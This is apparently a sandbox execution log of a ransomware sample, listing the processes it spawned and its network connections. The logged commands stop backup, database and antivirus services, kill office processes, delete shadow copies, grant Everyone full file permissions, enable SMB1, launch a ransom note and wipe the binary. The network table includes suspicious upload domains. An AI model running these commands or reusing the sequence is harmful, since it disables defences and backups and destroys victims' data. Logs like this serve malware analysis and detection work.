C:\Windows\system32\net1 stop msftesql$PROD /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “SQLsafe Filter Service” /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeSA /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop CAARCUpdateSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Symantec System Recovery” /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop UI0Detect /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop sophos /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$TPS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLServerADHelper100 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop wbengine /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McAfeeFramework /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mfefire /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop W3Svc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos File Scanner Service” /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Veeam Backup Catalog Data Service” /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop CASAD2DWebSvc /y
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "189307140238978187249660684893735857661344639-1720596160-2053468275-857941555"
C:\Windows\SysWOW64\net.exe
"net.exe" stop ReportServer$SQL_2008 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop sophos /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamMountSvc /y
C:\Windows\SysWOW64\arp.exe
"arp" -a
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSExchangeSRS /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop “Acronis VSS Provider” /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLServerOLAPService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop “Zoolz 2 Service” /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSOLAP$TPS /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop ReportServer$TPSAMA /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Health Service” /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop mfemms /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop wbengine /y
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-844076941-1092393732-1850109459-17565218082059912405-815250841-1429742881-713413756"
C:\Windows\SysWOW64\net.exe
"net.exe" stop RESvc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop McAfeeFrameworkMcAfeeFramework /y
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c net view
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" & Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol
C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamNFSSvc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MsDtsServer /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop “aphidmonitorservice” /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$CITRIX_METAFRAME /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop IISAdmin /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop AcrSch2Svc /y
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-68735326-5056036131313275624-2291945142893465241538636704-467938199613081133"
C:\Windows\SysWOW64\net.exe
"net.exe" stop msexchangeimap4 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop “intel(r) proset monitoring service” /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSOLAP$TPSAMA /y
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "683111131349876665-339622279-2105309224149161751542262906-987451766894225895"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "880083956-160111875-19419675551522892634-4900239171820484090-8918060321846682791"
C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos MCS Client” /y
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1409441447-166358734011141505841170503562-53167424812792674551949113955417370641"
C:\Windows\SysWOW64\net.exe
"net.exe" stop ARSM /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos MCS Agent” /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop msexchangeadtopology /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MySQL57 /y
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-11503997201525866783-2636398131806831343596679775-19656487391909011136-770565243"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1750091196-1541920400-2012754478-321385066-875635047-322969583-18022786051186940972"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "893441057-1530893456-352293957-1559822984-419533987-457585707769182777-1306135271"
C:\Windows\SysWOW64\net.exe
"net.exe" stop Smcinst /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop unistoresvc_1af40a /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$BKUPEXEC /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Message Router” /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop McShield /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$PROD /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop ShMonitor /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$PRACTTICEMGT /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SepMasterService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$PRACTTICEBGC /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SAVService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$ECWDB2 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SAVAdminService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$CXDB /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop AVP /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecVSSProvider /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SBSMONITORING /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SBSMONITORING /
C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamRESTSvc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$PROFXENGAGEMENT /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$SYSTEM_BGC /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop TrueKey /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop mssql$vim_sqlexp /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop McTaskManager /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamTransportSvc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop OracleClientCache80 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$SBSMONITORING /y
C:\Windows\SysWOW64\arp.exe
"arp" -a
C:\Windows\SysWOW64\net.exe
"net.exe" stop SmcService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MySQL80 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SntpService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Safestore Service” /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop audioendpointbuilder /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$ECWDB2 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop vapiendpoint /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop WRSVC /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLTELEMETRY$ECWDB2 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop TrueKeyServiceHelper /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLTELEMETRY /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop TrueKeyScheduler /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLSERVERAGENT /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLSafeOLRService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecAgentBrowser /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop tmlisten /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLBrowser /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop TmCCSF /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$VEEAMSQL2012 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$SHAREPOINT /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$SQLEXPRESS /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$PRACTTICEBGC /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecDeviceMediaService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos System Protection Service” /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$PRACTICEMGT /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop svcGenericHost /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$SOPHOS /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$SQL_2008 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop sophossps /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop swi_update_64 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop swi_update /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$TPSAMA /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop swi_service /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$TPS /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop swi_filter /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop DCAgent /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SHAREPOINT /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecAgentAccelerator /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop EraserSvc11710 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Agent” /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop sacsvr /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSExchangeES /y
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1856244861-16479583311265349185-11306903041158274405-1576223994-3688727521460863706"
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SOPHOS /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Web Control Service” /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$BKUPEXEC /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecJobEngine /y
C:\Windows\SysWOW64\net.exe
net view
C:\Windows\SysWOW64\net.exe
"net.exe" stop sms_site_sql_backup /y
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "244172938-1898520942810559031145472652-12320168231070488151-770320977-1578820010"
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$PROD /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop mfevtp /y
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1518877750-1753057878-2920150211223463562-1176132614-4931925167650328561741883803"
C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecManagementService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$PROFXENGAGEMENT /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop AcronisAgent /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop Antivirus /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecRPCService /y
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mysqld.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqbcoreservice.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM synctime.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM thebat.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM firefoxconfig.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM Ntrtscan.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM isqlplussvc.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM steam.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM agntsvc.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM excel.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" IM thunderbird.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM encsvc.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqlwriter.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM CNTAoSMgr.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM PccNTMon.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM tbirdconfig.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM onenote.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM tmlisten.exe /F
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamMountSvc /y
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM msftesql.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM xfssvccon.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM dbsnmp.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM dbeng50.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM outlook.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM thebat64.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM msaccess.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM oracle.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM ocomm.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM visio.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM powerpnt.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqlagent.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM infopath.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM winword.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqlbrowser.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mbamtray.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM zoolz.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM wordpad.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mysqld-nt.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mysqld-opt.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqlservr.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM ocautoupds.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM ocssd.exe /F
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
C:\Windows\SysWOW64\icacls.exe
"icacls" "Z:*" /grant Everyone:F /T /C /Q
C:\Windows\SysWOW64\icacls.exe
"icacls" "D:*" /grant Everyone:F /T /C /Q
C:\Windows\SysWOW64\icacls.exe
"icacls" "C:*" /grant Everyone:F /T /C /Q
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLServerOLAPService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop wbengine /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Acronis VSS Provider” /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSOLAP$TPS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeSRS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mfemms /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MsDtsServer /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamNFSSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Health Service” /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Zoolz 2 Service” /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mfevtp /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop RESvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$TPSAMA /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SOPHOS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “aphidmonitorservice” /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop IISAdmin /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop msexchangeimap4 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MySQL57 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AcrSch2Svc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop msexchangeadtopology /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop sms_site_sql_backup /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos MCS Agent” /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ARSM /y
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-56209806-99784166420517067981251393499782245764148889861711332975201400665353"
C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.7.0.34
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop sacsvr /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos MCS Client” /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SAVAdminService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop swi_service /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSOLAP$TPSAMA /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeES /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “intel(r) proset monitoring service” /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MySQL80 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SAVService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$CXDB /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamRESTSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecVSSProvider /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McShield /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TrueKeyServiceHelper /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop DCAgent /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop unistoresvc_1af40a /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop swi_update_64 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop swi_filter /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PROD /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TrueKeyScheduler /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Agent” /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TrueKey /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop WRSVC /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TmCCSF /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop swi_update /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop vapiendpoint /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop tmlisten /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AVP /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop audioendpointbuilder /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ShMonitor /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Message Router” /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Smcinst /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EraserSvc11710 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SepMasterService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop sophossps /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mssql$vim_sqlexp /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$PROD /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLSERVERAGENT /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$TPSAMA /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLSafeOLRService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$TPS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SntpService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McTaskManager /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop OracleClientCache80 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLTELEMETRY /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$ECWDB2 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLBrowser /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Web Control Service” /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SmcService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamTransportSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop svcGenericHost /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SOPHOS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos System Protection Service” /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AcronisAgent /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecJobEngine /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecDeviceMediaService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecRPCService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Antivirus /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecManagementService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Safestore Service” /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\dd4eb8aa3371b7fd821a7a9730c924cf.exe
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.7 -n 3
C:\Windows\SysWOW64\choice.exe
choice /C Y /N /D Y /T 3
C:\Windows\SysWOW64\fsutil.exe
fsutil file setZeroData offset=0 length=524288 “%s”
Network
| Country | Destination | Domain | Proto |
| N/A | 239.255.255.250:3702 | udp | |
| US | 8.8.8.8:53 | www.poweradmin.com | udp |
| US | 52.1.55.52:443 | www.poweradmin.com | tcp |
| US | 8.8.8.8:53 | live.sysinternals.com | udp |
| GB | 20.49.223.105:80 | live.sysinternals.com | tcp |
| N/A | 10.7.0.255:3 | udp | |
| N/A | 10.7.0.255:3 | udp | |
| N/A | 10.7.0.255:3 | udp | |
| N/A | 10.7.0.255:3 | udp | |
| N/A | 10.7.0.255:3 | udp | |
| N/A | 224.0.0.255:3 | udp | |
| N/A | 224.0.0.255:3 | udp | |
| N/A | 239.255.255.255:3 | udp | |
| N/A | 255.255.255.255:3 | udp | |
| US | 8.8.8.8:53 | icanhazip.com | udp |
| US | 104.22.18.188:80 | icanhazip.com | tcp |
| US | 8.8.8.8:53 | prometheusstat.in | udp |
| US | 8.8.8.8:53 | www.imgurupload.com | udp |
| US | 192.185.186.18:443 | www.imgurupload.com | tcp |
| US | 192.185.186.18:443 | www.imgurupload.com | tcp |
